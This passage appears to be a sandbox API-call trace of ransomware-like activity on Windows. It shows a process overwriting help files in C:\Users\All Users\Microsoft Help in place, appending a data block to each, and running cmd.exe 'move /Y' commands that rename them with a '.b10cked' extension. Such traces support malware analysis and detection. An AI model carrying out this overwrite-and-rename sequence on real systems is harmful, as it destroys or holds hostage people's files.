lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xda4, dwThreadId=0xc78)) returned 1 [0198.102] CloseHandle (hObject=0x1b4) returned 1 [0198.102] CloseHandle (hObject=0x120) returned 1 [0198.102] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL 
USERS\\MICROSOFT HELP\\") returned 0x22 [0198.102] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.102] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.102] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.102] ReleaseMutex (hMutex=0xf8) returned 1 [0198.102] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.102] ReleaseMutex (hMutex=0xf8) returned 1 [0198.102] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.102] ReleaseMutex (hMutex=0xf8) returned 1 [0198.102] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.103] ReleaseMutex (hMutex=0xf8) returned 1 [0198.103] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.103] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.103] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.103] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.103] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25489262330) returned 1 [0198.103] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.103] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x14c [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.104] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.105] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.105] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.105] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.105] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.105] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.105] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.105] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x14c [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x14c [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.106] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: 
lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa5, lpOverlapped=0x0) returned 1 [0198.111] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.112] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa5, lpOverlapped=0x0) returned 1 [0198.112] SetFilePointer (in: hFile=0x120, lDistanceToMove=-165, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa7 [0198.113] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa5, lpOverlapped=0x0) returned 1 [0198.113] SetFilePointer (in: hFile=0x120, lDistanceToMove=-165, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa7 [0198.113] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa5, lpOverlapped=0x0) returned 1 [0198.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSTORE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0198.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSTORE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSTORE.14.1033.hxn", lpUsedDefaultChar=0x0) returned 21 [0198.120] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) 
returned 0x14c [0198.120] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.127] CloseHandle (hObject=0x120) returned 1 [0198.140] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN") returned 0x27 [0198.169] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.170] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd20, dwThreadId=0xd54)) returned 1 [0198.368] CloseHandle (hObject=0x1b4) returned 1 [0198.368] CloseHandle (hObject=0x120) returned 1 [0198.368] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.368] CharUpperBuffW 
(in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.368] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.368] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.368] ReleaseMutex (hMutex=0xf8) returned 1 [0198.368] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.368] ReleaseMutex (hMutex=0xf8) returned 1 [0198.368] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.368] ReleaseMutex (hMutex=0xf8) returned 1 [0198.368] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.368] ReleaseMutex (hMutex=0xf8) returned 1 [0198.369] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.370] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25515922877) returned 1 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 
0x0 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x13a [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x13a [0198.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x13a [0198.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.372] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0x9c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0x9c, lpOverlapped=0x0) returned 1 [0198.373] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.373] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0x9c, lpOverlapped=0x0) returned 1 [0198.373] SetFilePointer (in: hFile=0x120, lDistanceToMove=-156, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9e [0198.373] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0x9c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0x9c, lpOverlapped=0x0) returned 1 [0198.373] SetFilePointer (in: hFile=0x120, lDistanceToMove=-156, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9e [0198.373] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0x9c, lpOverlapped=0x0) returned 1 [0198.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OIS.14.1033.hxn", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0198.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OIS.14.1033.hxn", cchWideChar=18, lpMultiByteStr=0x1328794, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.OIS.14.1033.hxn", lpUsedDefaultChar=0x0) returned 18 [0198.377] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x13a [0198.378] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, 
lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.378] CloseHandle (hObject=0x120) returned 1 [0198.378] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN") returned 0x27 [0198.379] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.380] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, 